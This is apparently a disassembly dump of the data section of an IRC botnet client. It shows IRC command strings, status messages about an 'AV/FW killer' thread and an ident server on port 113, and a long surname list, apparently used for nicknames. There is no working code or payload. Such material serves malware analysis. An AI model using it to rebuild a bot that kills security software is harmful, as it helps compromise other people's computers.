aSS_1 db ':%s%s',0 ; DATA XREF: sub_40274D+48C�o
align 10h
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_40274D+378�o
align 4
; char aNoticeSS[]
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+322�o
; sub_40274D+585�o
; char asc_42FDE8[]
asc_42FDE8 db '-' ; DATA XREF: sub_40274D+307�o
; sub_40274D+2C92�o ...
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_0 db 'User %s logged out.',0
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_40274D+2AC�o
align 10h
; char aNickS[]
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+263�o
; sub_40274D+7874�o ...
align 4
; char a433[]
a433 db '433',0 ; DATA XREF: sub_40274D+23B�o
; sub_41A6AE:loc_41A723�o
; char a[]
a@: ; DATA XREF: sub_40274D+213�o
unicode 0, <@>,0
; char a302_0[]
a302_0 db '302',0 ; DATA XREF: sub_40274D+203�o
; char a005[]
a005 db '005',0 ; DATA XREF: sub_40274D+1EE�o
; char a001[]
a001 db '001',0 ; DATA XREF: sub_40274D+1D9�o
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+1BE�o
; sub_40274D+365�o ...
align 10h
; char aPongS[]
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+1A1�o
align 4
; char Str1[]
Str1 db 'PING',0 ; DATA XREF: sub_40274D+18A�o
; sub_41A6AE+4E�o
align 4
; char Delim[]
Delim: ; DATA XREF: sub_40274D+17B�o
; sub_40274D+7981�o
unicode 0, <!>,0
; char asc_42FE58[]
asc_42FE58: ; DATA XREF: sub_40274D+A9�o
; sub_40274D+D04�o ...
unicode 0, < >,0
; char SubStr[]
SubStr db ' :',0 ; DATA XREF: sub_40274D+87�o
; sub_40274D:loc_403191�o
align 10h
; char asc_42FE60[]
asc_42FE60 db '-' ; DATA XREF: WinMain(x,x,x,x)+452�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aFailedToSta_32 db '- Failed to start server, error: <%d>.',0
align 4
; char asc_42FE94[]
asc_42FE94 db '-' ; DATA XREF: WinMain(x,x,x,x)+407�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aServerRunnin_0 db '- Server running on Port: 113.',0
align 10h
; char asc_42FEC0[]
asc_42FEC0 db '-' ; DATA XREF: WinMain(x,x,x,x)+3DA�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 10h
; char asc_42FF00[]
asc_42FF00 db '-' ; DATA XREF: WinMain(x,x,x,x)+389�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 4
; char asc_42FF24[]
asc_42FF24 db '-' ; DATA XREF: WinMain(x,x,x,x)+34E�o
db 3, 34h, 2
dd 6E69616Dh, 202D0203h, 20746F42h, 72617473h, 2E646574h
dd 0
; char aSDS[]
aSDS db '%s %d "%s"',0 ; DATA XREF: WinMain(x,x,x,x)+279�o
align 4
; char aSS_0[]
aSS_0 db '%s\%s',0 ; DATA XREF: WinMain(x,x,x,x)+182�o
; sub_4185EA+7E�o ...
align 4
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: WinMain(x,x,x,x)+106�o
; sub_412135+4CF�o ...
align 4
aZytowski db 'Zytowski',0 ; DATA XREF: .data:0043D750�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: .data:0043D74C�o
align 10h
aZurn db 'Zurn',0 ; DATA XREF: .data:0043D748�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: .data:0043D744�o
aZoldak db 'Zoldak',0 ; DATA XREF: .data:0043D740�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: .data:0043D73C�o
aZegans db 'Zegans',0 ; DATA XREF: .data:0043D738�o
align 4
aZangwill db 'Zangwill',0 ; DATA XREF: .data:0043D734�o
align 4
aZahedi db 'Zahedi',0 ; DATA XREF: .data:0043D730�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: .data:0043D72C�o
aYu db 'Yu',0 ; DATA XREF: .data:0043D728�o
align 4
aYoukSee db 'Youk-See',0 ; DATA XREF: .data:0043D724�o
align 4
aYoo db 'Yoo',0 ; DATA XREF: .data:0043D720�o
aYoffe db 'Yoffe',0 ; DATA XREF: .data:0043D71C�o
align 10h
aYetiv db 'Yetiv',0 ; DATA XREF: .data:0043D718�o
align 4
aYesson db 'Yesson',0 ; DATA XREF: .data:0043D714�o
align 10h
aYedidia db 'Yedidia',0 ; DATA XREF: .data:0043D710�o
aYbarra db 'Ybarra',0 ; DATA XREF: .data:0043D70C�o
align 10h
aYates db 'Yates',0 ; DATA XREF: .data:0043D708�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: .data:0043D704�o
aYankee db 'Yankee',0 ; DATA XREF: .data:0043D700�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: .data:0043D6FC�o
align 10h
aYacono db 'Yacono',0 ; DATA XREF: .data:0043D6F8�o
align 4
aVotey db 'Votey',0 ; DATA XREF: .data:0043D6F4�o
align 10h
byte_430020 db 56h ; DATA XREF: .data:0043D6F0�o
aOrhaus db 'orhaus',0 ; DATA XREF: .data:off_43FE7C�o
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: .data:0043D6EC�o
align 4
aWoods db 'Woods',0 ; DATA XREF: .data:0043D6E8�o
align 10h
aWooden db 'Wooden',0 ; DATA XREF: .data:0043D6E4�o
align 4
aWoo db 'Woo',0 ; DATA XREF: .data:0043D6E0�o
aVonhoffman db 'VonHoffman',0 ; DATA XREF: .data:0043D6DC�o
; .rdata:00432F90�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: .data:0043D6D8�o
; .data:off_43E4C8�o
align 10h
aVoigt db 'Voigt',0 ; DATA XREF: .data:0043D6D4�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: .data:0043D6D0�o
aVitali db 'Vitali',0 ; DATA XREF: .data:0043D6CC�o
align 4
aWilson db 'Wilson',0 ; DATA XREF: .data:0043D6C8�o
align 10h
aWillstatter db 'Willstatter',0 ; DATA XREF: .data:0043D6C4�o
aVillarreal db 'Villarreal',0 ; DATA XREF: .data:0043D6C0�o
align 4
aWilkinson db 'Wilkinson',0 ; DATA XREF: .data:0043D6BC�o
align 4
aWilkin db 'Wilkin',0 ; DATA XREF: .data:0043D6B8�o
align 4
aWilk db 'Wilk',0 ; DATA XREF: .data:0043D6B4�o
align 4
aWilhelm db 'Wilhelm',0 ; DATA XREF: .data:0043D6B0�o
aWilder db 'Wilder',0 ; DATA XREF: .data:0043D6AC�o
align 4
aVignola db 'Vignola',0 ; DATA XREF: .data:0043D6A8�o
aViens db 'Viens',0 ; DATA XREF: .data:0043D6A4�o
align 4
aWiener db 'Wiener',0 ; DATA XREF: .data:0043D6A0�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: .data:0043D69C�o
aViano db 'Viano',0 ; DATA XREF: .data:0043D698�o
align 10h
aViana db 'Viana',0 ; DATA XREF: .data:0043D694�o
align 4
aWhittaker db 'Whittaker',0 ; DATA XREF: .data:0043D690�o
align 4
aWhitla db 'Whitla',0 ; DATA XREF: .data:0043D68C�o
align 4
aWhite db 'White',0 ; DATA XREF: .data:0043D688�o
align 4
aWhilton db 'Whilton',0 ; DATA XREF: .data:0043D684�o
aWhately db 'Whately',0 ; DATA XREF: .data:0043D680�o
aWetzel db 'Wetzel',0 ; DATA XREF: .data:0043D67C�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: .data:0043D678�o
aVerghese db 'Verghese',0 ; DATA XREF: .data:0043D674�o
align 10h
aVenne db 'Venne',0 ; DATA XREF: .data:0043D670�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: .data:0043D66C�o
aWelsh db 'Welsh',0 ; DATA XREF: .data:0043D668�o
align 4
aWelles db 'Welles',0 ; DATA XREF: .data:0043D664�o
align 10h
aVelasquez db 'Velasquez',0 ; DATA XREF: .data:0043D660�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: .data:0043D65C�o
align 4
aWeissbourd db 'Weissbourd',0 ; DATA XREF: .data:0043D658�o
align 4
aWeinhaus db 'Weinhaus',0 ; DATA XREF: .data:0043D654�o
align 10h
aWeingarten db 'Weingarten',0 ; DATA XREF: .data:0043D650�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: .data:0043D64C�o
align 4
aWaugh db 'Waugh',0 ; DATA XREF: .data:0043D648�o
align 10h
aVasquez db 'Vasquez',0 ; DATA XREF: .data:0043D644�o
aWasowska db 'Wasowska',0 ; DATA XREF: .data:0043D640�o
align 4
aWarshafsky db 'Warshafsky',0 ; DATA XREF: .data:0043D63C�o
align 10h
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: .data:0043D638�o
align 10h
aVandenberg db 'Vandenberg',0 ; DATA XREF: .data:0043D634�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: .data:0043D630�o
aVanallen db 'vanAllen',0 ; DATA XREF: .data:0043D62C�o
align 10h
aWalter db 'Walter',0 ; DATA XREF: .data:0043D628�o
align 4
aWallenberg db 'Wallenberg',0 ; DATA XREF: .data:0043D624�o
align 4
aWales db 'Wales',0 ; DATA XREF: .data:0043D620�o
align 4
aValencia db 'Valencia',0 ; DATA XREF: .data:0043D61C�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: .data:0043D618�o
aWaite db 'Waite',0 ; DATA XREF: .data:0043D614�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: .data:0043D610�o
align 10h
aUzuner db 'Uzuner',0 ; DATA XREF: .data:0043D60C�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: .data:0043D608�o
align 10h
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: .data:0043D604�o
align 10h
aUrban db 'Urban',0 ; DATA XREF: .data:0043D600�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: .data:0043D5FC�o
aUntermeyer db 'Untermeyer',0 ; DATA XREF: .data:0043D5F8�o
align 4
aUllman db 'Ullman',0 ; DATA XREF: .data:0043D5F4�o
align 4
aTzamarias db 'Tzamarias',0 ; DATA XREF: .data:0043D5F0�o
align 10h
aTwells db 'Twells',0 ; DATA XREF: .data:0043D5EC�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: .data:0043D5E8�o
align 10h
aTurek db 'Turek',0 ; DATA XREF: .data:0043D5E4�o
align 4
aTurano db 'Turano',0 ; DATA XREF: .data:0043D5E0�o
align 10h
aTukan db 'Tukan',0 ; DATA XREF: .data:0043D5DC�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: .data:0043D5D8�o
align 10h
aTuck db 'Tuck',0 ; DATA XREF: .data:0043D5D4�o
align 4
aTsukurov db 'Tsukurov',0 ; DATA XREF: .data:0043D5D0�o
align 4
aTsomides db 'Tsomides',0 ; DATA XREF: .data:0043D5CC�o
align 10h
aTsiatis db 'Tsiatis',0 ; DATA XREF: .data:0043D5C8�o
aTruss db 'Truss',0 ; DATA XREF: .data:0043D5C4�o
align 10h
aTroy db 'Troy',0 ; DATA XREF: .data:0043D5C0�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: .data:0043D5BC�o
aTringali db 'Tringali',0 ; DATA XREF: .data:0043D5B8�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: .data:0043D5B4�o
align 4
aTrenga db 'Trenga',0 ; DATA XREF: .data:0043D5B0�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: .data:0043D5AC�o
align 4
aToye db 'Toye',0 ; DATA XREF: .data:0043D5A8�o
align 10h
aTowler db 'Towler',0 ; DATA XREF: .data:0043D5A4�o
align 4
aTorske db 'Torske',0 ; DATA XREF: .data:0043D5A0�o
align 10h
aTorresi db 'Torresi',0 ; DATA XREF: .data:0043D59C�o
aTopulos db 'Topulos',0 ; DATA XREF: .data:0043D598�o
aToomer db 'Toomer',0 ; DATA XREF: .data:0043D594�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: .data:0043D590�o
aTolman db 'Tolman',0 ; DATA XREF: .data:0043D58C�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: .data:0043D588�o
align 10h
aTollestrup db 'Tollestrup',0 ; DATA XREF: .data:0043D584�o
align 4
aTofallis db 'Tofallis',0 ; DATA XREF: .data:0043D580�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: .data:0043D57C�o
aTill db 'Till',0 ; DATA XREF: .data:0043D578�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: .data:0043D574�o
aThroop db 'Throop',0 ; DATA XREF: .data:0043D570�o
align 4
aThomsen db 'Thomsen',0 ; DATA XREF: .data:0043D56C�o
aThisted db 'Thisted',0 ; DATA XREF: .data:0043D568�o
aThibault db 'Thibault',0 ; DATA XREF: .data:0043D564�o
align 4
aTheodos db 'Theodos',0 ; DATA XREF: .data:0043D560�o
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: .data:0043D55C�o
align 4
aThan db 'Than',0 ; DATA XREF: .data:0043D558�o
align 4
aTerracini db 'Terracini',0 ; DATA XREF: .data:0043D554�o
align 10h
aTenney db 'Tenney',0 ; DATA XREF: .data:0043D550�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: .data:0043D54C�o
align 10h
aTemes db 'Temes',0 ; DATA XREF: .data:0043D548�o
align 4
aTeague db 'Teague',0 ; DATA XREF: .data:0043D544�o
align 10h
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: .data:0043D540�o
align 4
aTawn db 'Tawn',0 ; DATA XREF: .data:0043D53C�o
align 4
aTaveras db 'Taveras',0 ; DATA XREF: .data:0043D538�o
aTatar db 'Tatar',0 ; DATA XREF: .data:0043D534�o
align 4
aTanowitz db 'Tanowitz',0 ; DATA XREF: .data:0043D530�o
align 10h
aTandler db 'Tandler',0 ; DATA XREF: .data:0043D52C�o
aTambiah db 'Tambiah',0 ; DATA XREF: .data:0043D528�o
aTalaugon db 'Talaugon',0 ; DATA XREF: .data:0043D524�o
align 4
aTai db 'Tai',0 ; DATA XREF: .data:0043D520�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: .data:0043D51C�o
aSwindle db 'Swindle',0 ; DATA XREF: .data:0043D518�o
aSweetser db 'Sweetser',0 ; DATA XREF: .data:0043D514�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: .data:0043D510�o
align 4
aSurdam db 'Surdam',0 ; DATA XREF: .data:0043D50C�o
align 10h
aSuo db 'Suo',0 ; DATA XREF: .data:0043D508�o
aSumner db 'Sumner',0 ; DATA XREF: .data:0043D504�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: .data:0043D500�o
align 4
aStringer db 'Stringer',0 ; DATA XREF: .data:0043D4FC�o
align 4
aStreiff db 'Streiff',0 ; DATA XREF: .data:0043D4F8�o
aStrauch db 'Strauch',0 ; DATA XREF: .data:0043D4F4�o
aStrange db 'Strange',0 ; DATA XREF: .data:0043D4F0�o
aStott db 'Stott',0 ; DATA XREF: .data:0043D4EC�o
align 4
aStorer db 'Storer',0 ; DATA XREF: .data:0043D4E8�o
align 4
aStonich db 'Stonich',0 ; DATA XREF: .data:0043D4E4�o
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: .data:0043D4E0�o
aStockwell db 'Stockwell',0 ; DATA XREF: .data:0043D4DC�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: .data:0043D4D8�o
align 4
aStock db 'Stock',0 ; DATA XREF: .data:0043D4D4�o
align 10h
aStillwell db 'Stillwell',0 ; DATA XREF: .data:0043D4D0�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: .data:0043D4CC�o
align 4
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: .data:0043D4C8�o
align 4
aStepniewska db 'Stepniewska',0 ; DATA XREF: .data:0043D4C4�o
aStephanian db 'Stephanian',0 ; DATA XREF: .data:0043D4C0�o
align 10h
aSteiner db 'Steiner',0 ; DATA XREF: .data:0043D4BC�o
aStefani db 'Stefani',0 ; DATA XREF: .data:0043D4B8�o
aStatlender db 'Statlender',0 ; DATA XREF: .data:0043D4B4�o
align 4
aStates db 'States',0 ; DATA XREF: .data:0043D4B0�o
align 4
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: .data:0043D4AC�o
align 4
aStang db 'Stang',0 ; DATA XREF: .data:0043D4A8�o
align 4
aStam db 'Stam',0 ; DATA XREF: .data:0043D4A4�o
align 4
aStalvey db 'Stalvey',0 ; DATA XREF: .data:0043D4A0�o
aStmartin db 'StMartin',0 ; DATA XREF: .data:0043D49C�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: .data:0043D498�o
aSpiliotis db 'Spiliotis',0 ; DATA XREF: .data:0043D494�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: .data:0043D490�o
align 4
aSpicer db 'Spicer',0 ; DATA XREF: .data:0043D48C�o
align 4
aSperber db 'Sperber',0 ; DATA XREF: .data:0043D488�o
aSpence db 'Spence',0 ; DATA XREF: .data:0043D484�o
align 4
aSpeizer db 'Speizer',0 ; DATA XREF: .data:0043D480�o
aSpaulding db 'Spaulding',0 ; DATA XREF: .data:0043D47C�o
align 4
aSparrow db 'Sparrow',0 ; DATA XREF: .data:0043D478�o
aSpanier db 'Spanier',0 ; DATA XREF: .data:0043D474�o
aSoultanian db 'Soultanian',0 ; DATA XREF: .data:0043D470�o
align 4
aSoule db 'Soule',0 ; DATA XREF: .data:0043D46C�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: .data:0043D468�o
align 4
aSottak db 'Sottak',0 ; DATA XREF: .data:0043D464�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: .data:0043D460�o
align 4
aSorabella db 'Sorabella',0 ; DATA XREF: .data:0043D45C�o
align 10h
aSommariva db 'Sommariva',0 ; DATA XREF: .data:0043D458�o
align 4
aSomers db 'Somers',0 ; DATA XREF: .data:0043D454�o
align 4
aSolon db 'Solon',0 ; DATA XREF: .data:0043D450�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: .data:0043D44C�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: .data:0043D448�o
align 10h
aSniffen db 'Sniffen',0 ; DATA XREF: .data:0043D444�o
aSmilow db 'Smilow',0 ; DATA XREF: .data:0043D440�o
align 10h
aSlowe db 'Slowe',0 ; DATA XREF: .data:0043D43C�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: .data:0043D438�o
align 10h
aSkoda db 'Skoda',0 ; DATA XREF: .data:0043D434�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: .data:0043D430�o
align 10h
aSkane db 'Skane',0 ; DATA XREF: .data:0043D42C�o
align 4
aSites db 'Sites',0 ; DATA XREF: .data:0043D428�o
align 10h
aSirilli db 'Sirilli',0 ; DATA XREF: .data:0043D424�o
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: .data:0043D420�o
align 4
aSilvetti db 'Silvetti',0 ; DATA XREF: .data:0043D41C�o
align 10h
aSilverman db 'Silverman',0 ; DATA XREF: .data:0043D418�o
align 4
aSigna db 'Signa',0 ; DATA XREF: .data:0043D414�o
align 4
aSigini db 'Sigini',0 ; DATA XREF: .data:0043D410�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: .data:0043D40C�o
aSiesto db 'Siesto',0 ; DATA XREF: .data:0043D408�o
align 4
aShimon db 'Shimon',0 ; DATA XREF: .data:0043D404�o
align 4
aShibata db 'Shibata',0 ; DATA XREF: .data:0043D400�o
aShia db 'Shia',0 ; DATA XREF: .data:0043D3FC�o
align 4
aShesko db 'Shesko',0 ; DATA XREF: .data:0043D3F8�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: .data:0043D3F4�o
align 4
aSheppard db 'Sheppard',0 ; DATA XREF: .data:0043D3F0�o
align 4
aShepherd db 'Shepherd',0 ; DATA XREF: .data:0043D3EC�o
align 10h
aSheats db 'Sheats',0 ; DATA XREF: .data:0043D3E8�o
align 4
aShea db 'Shea',0 ; DATA XREF: .data:0043D3E4�o
align 10h
aShavelson db 'Shavelson',0 ; DATA XREF: .data:0043D3E0�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: .data:0043D3DC�o
aShar db 'Shar',0 ; DATA XREF: .data:0043D3D8�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: .data:0043D3D4�o
aShankland db 'Shankland',0 ; DATA XREF: .data:0043D3D0�o
align 10h
aShakis db 'Shakis',0 ; DATA XREF: .data:0043D3CC�o
align 4
aShaikh db 'Shaikh',0 ; DATA XREF: .data:0043D3C8�o
align 10h
aSeyfert db 'Seyfert',0 ; DATA XREF: .data:0043D3C4�o
aSexton db 'Sexton',0 ; DATA XREF: .data:0043D3C0�o
align 10h
aSeterdahl db 'Seterdahl',0 ; DATA XREF: .data:0043D3BC�o
align 4
aSennett db 'Sennett',0 ; DATA XREF: .data:0043D3B8�o
aSen db 'Sen',0 ; DATA XREF: .data:0043D3B4�o
aSelvage db 'Selvage',0 ; DATA XREF: .data:0043D3B0�o
aSekler db 'Sekler',0 ; DATA XREF: .data:0043D3AC�o
align 4
aSegal db 'Segal',0 ; DATA XREF: .data:0043D3A8�o
align 10h
aSeeber db 'Seeber',0 ; DATA XREF: .data:0043D3A4�o
align 4
aSeaton db 'Seaton',0 ; DATA XREF: .data:0043D3A0�o
align 10h
aScudder db 'Scudder',0 ; DATA XREF: .data:0043D39C�o
aScovel db 'Scovel',0 ; DATA XREF: .data:0043D398�o
align 10h
aSchwickrath db 'Schwickrath',0 ; DATA XREF: .data:0043D394�o
aSchwan db 'Schwan',0 ; DATA XREF: .data:0043D390�o
align 4
aSchuyler db 'Schuyler',0 ; DATA XREF: .data:0043D38C�o
align 10h
aSchutte db 'Schutte',0 ; DATA XREF: .data:0043D388�o
aSchuman db 'Schuman',0 ; DATA XREF: .data:0043D384�o
aSchossberger db 'Schossberger',0 ; DATA XREF: .data:0043D380�o
align 10h
aSchmitt db 'Schmitt',0 ; DATA XREF: .data:0043D37C�o
aSchilling db 'Schilling',0 ; DATA XREF: .data:0043D378�o
align 4
aSchifini db 'Schifini',0 ; DATA XREF: .data:0043D374�o
align 10h
aSchiano db 'Schiano',0 ; DATA XREF: .data:0043D370�o
aScheiner db 'Scheiner',0 ; DATA XREF: .data:0043D36C�o
align 4
aScharlemann db 'Scharlemann',0 ; DATA XREF: .data:0043D368�o
aScharf db 'Scharf',0 ; DATA XREF: .data:0043D364�o
align 4
aScepan db 'Scepan',0 ; DATA XREF: .data:0043D360�o
align 10h
aScarponi db 'Scarponi',0 ; DATA XREF: .data:0043D35C�o
align 4
aSayied db 'Sayied',0 ; DATA XREF: .data:0043D358�o
align 4
aSawtell db 'Sawtell',0 ; DATA XREF: .data:0043D354�o
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: .data:0043D350�o
align 4
aSatta db 'Satta',0 ; DATA XREF: .data:0043D34C�o
align 4
aSatin db 'Satin',0 ; DATA XREF: .data:0043D348�o
align 4
aSase db 'Sase',0 ; DATA XREF: .data:0043D344�o
align 4
aSartore db 'Sartore',0 ; DATA XREF: .data:0043D340�o
aSarin db 'Sarin',0 ; DATA XREF: .data:0043D33C�o
align 4
aSapers db 'Sapers',0 ; DATA XREF: .data:0043D338�o
align 4
aSanna db 'Sanna',0 ; DATA XREF: .data:0043D334�o
align 4
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: .data:0043D330�o
aSamson db 'Samson',0 ; DATA XREF: .data:0043D32C�o
align 4
aSali db 'Sali',0 ; DATA XREF: .data:0043D328�o
align 4
aSahu db 'Sahu',0 ; DATA XREF: .data:0043D324�o
align 4
aSafire db 'Safire',0 ; DATA XREF: .data:0043D320�o
align 4
aSadler db 'Sadler',0 ; DATA XREF: .data:0043D31C�o
align 4
aSabatello db 'Sabatello',0 ; DATA XREF: .data:0043D318�o
align 4
aRyu db 'Ryu',0 ; DATA XREF: .data:0043D314�o
aRush db 'Rush',0 ; DATA XREF: .data:0043D310�o
align 4
aRuescher db 'Ruescher',0 ; DATA XREF: .data:0043D30C�o
align 10h
aRuderman db 'Ruderman',0 ; DATA XREF: .data:0043D308�o
align 4
aRuan db 'Ruan',0 ; DATA XREF: .data:0043D304�o
align 4
aRu db 'Ru',0 ; DATA XREF: .data:0043D300�o
align 4
aRoyal db 'Royal',0 ; DATA XREF: .data:0043D2FC�o
align 10h
aRow db 'Row',0 ; DATA XREF: .data:0043D2F8�o
aRonen db 'Ronen',0 ; DATA XREF: .data:0043D2F4�o
align 4
aRogers db 'Rogers',0 ; DATA XREF: .data:0043D2F0�o
align 4
aRoesler db 'Roesler',0 ; DATA XREF: .data:0043D2EC�o
aRocha db 'Rocha',0 ; DATA XREF: .data:0043D2E8�o
align 4
aRobinson db 'Robinson',0 ; DATA XREF: .data:0043D2E4�o
align 10h
aRivera db 'Rivera',0 ; DATA XREF: .data:0043D2E0�o
align 4
aRish db 'Rish',0 ; DATA XREF: .data:0043D2DC�o
align 10h
aRineer db 'Rineer',0 ; DATA XREF: .data:0043D2D8�o
align 4
aRindos db 'Rindos',0 ; DATA XREF: .data:0043D2D4�o
align 10h
aRielly db 'Rielly',0 ; DATA XREF: .data:0043D2D0�o
align 4
aRichmond db 'Richmond',0 ; DATA XREF: .data:0043D2CC�o
align 4
aRhea db 'Rhea',0 ; DATA XREF: .data:0043D2C8�o
align 4
aResnik db 'Resnik',0 ; DATA XREF: .data:0043D2C4�o
align 4
aRepetto db 'Repetto',0 ; DATA XREF: .data:0043D2C0�o
aRenick db 'Renick',0 ; DATA XREF: .data:0043D2BC�o
align 4
aRemak db 'Remak',0 ; DATA XREF: .data:0043D2B8�o
align 4
aReinold db 'Reinold',0 ; DATA XREF: .data:0043D2B4�o
aCunningham db 'Cunningham',0 ; DATA XREF: .data:0043D2B0�o
align 10h
aReedquist db 'Reedquist',0 ; DATA XREF: .data:0043D2AC�o
align 4
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: .data:0043D2A8�o
align 4
aRayport db 'Rayport',0 ; DATA XREF: .data:0043D2A4�o
aRapple db 'Rapple',0 ; DATA XREF: .data:0043D2A0�o
align 4
aRankin db 'Rankin',0 ; DATA XREF: .data:0043D29C�o
align 4
aRangan db 'Rangan',0 ; DATA XREF: .data:0043D298�o
align 4
aRaney db 'Raney',0 ; DATA XREF: .data:0043D294�o
align 4
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: .data:0043D290�o
aRadeke db 'Radeke',0 ; DATA XREF: .data:0043D28C�o
align 4
aRabkin db 'Rabkin',0 ; DATA XREF: .data:0043D288�o
align 10h
aRabe db 'Rabe',0 ; DATA XREF: .data:0043D284�o
align 4
aQuetin db 'Quetin',0 ; DATA XREF: .data:0043D280�o
align 10h
aQuaday db 'Quaday',0 ; DATA XREF: .data:0043D27C�o
align 4
aPynchon db 'Pynchon',0 ; DATA XREF: .data:0043D278�o
aPugh db 'Pugh',0 ; DATA XREF: .data:0043D274�o
align 4
aPuccia db 'Puccia',0 ; DATA XREF: .data:0043D270�o
align 10h
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: .data:0043D26C�o
align 10h
aProietti db 'Proietti',0 ; DATA XREF: .data:0043D268�o
align 4
aPritz db 'Pritz',0 ; DATA XREF: .data:0043D264�o
align 4
aPritchard db 'Pritchard',0 ; DATA XREF: .data:0043D260�o
align 10h
aPrevost db 'Prevost',0 ; DATA XREF: .data:0043D25C�o
aPreucel db 'Preucel',0 ; DATA XREF: .data:0043D258�o
aPresper db 'Presper',0 ; DATA XREF: .data:0043D254�o
aPowers db 'Powers',0 ; DATA XREF: .data:0043D250�o
align 10h
aPoolman db 'Poolman',0 ; DATA XREF: .data:0043D24C�o
aPoma db 'Poma',0 ; DATA XREF: .data:0043D248�o
align 10h
aPolitis db 'Politis',0 ; DATA XREF: .data:0043D244�o
aPolanyi db 'Polanyi',0 ; DATA XREF: .data:0043D240�o
aPolak db 'Polak',0 ; DATA XREF: .data:0043D23C�o
align 4
aPoirier db 'Poirier',0 ; DATA XREF: .data:0043D238�o
aPointer db 'Pointer',0 ; DATA XREF: .data:0043D234�o
aPoincaire db 'Poincaire',0 ; DATA XREF: .data:0043D230�o
align 4
aPocobene db 'Pocobene',0 ; DATA XREF: .data:0043D22C�o
align 10h
aPo db 'Po',0 ; DATA XREF: .data:0043D228�o
align 4
aPlous db 'Plous',0 ; DATA XREF: .data:0043D224�o
align 4
aPlasket db 'Plasket',0 ; DATA XREF: .data:0043D220�o
aPlant db 'Plant',0 ; DATA XREF: .data:0043D21C�o
align 4
aPlancon db 'Plancon',0 ; DATA XREF: .data:0043D218�o
aPinot db 'Pinot',0 ; DATA XREF: .data:0043D214�o
align 4
aPilbeam db 'Pilbeam',0 ; DATA XREF: .data:0043D210�o
aPfister db 'Pfister',0 ; DATA XREF: .data:0043D20C�o
aPettit db 'Pettit',0 ; DATA XREF: .data:0043D208�o
align 4
aPettibone db 'Pettibone',0 ; DATA XREF: .data:0043D204�o
align 10h
aPetruzello db 'Petruzello',0 ; DATA XREF: .data:0043D200�o
align 4
aPeters db 'Peters',0 ; DATA XREF: .data:0043D1FC�o
align 4
aPerrimon db 'Perrimon',0 ; DATA XREF: .data:0043D1F8�o
align 10h
aPerone db 'Perone',0 ; DATA XREF: .data:0043D1F4�o
align 4
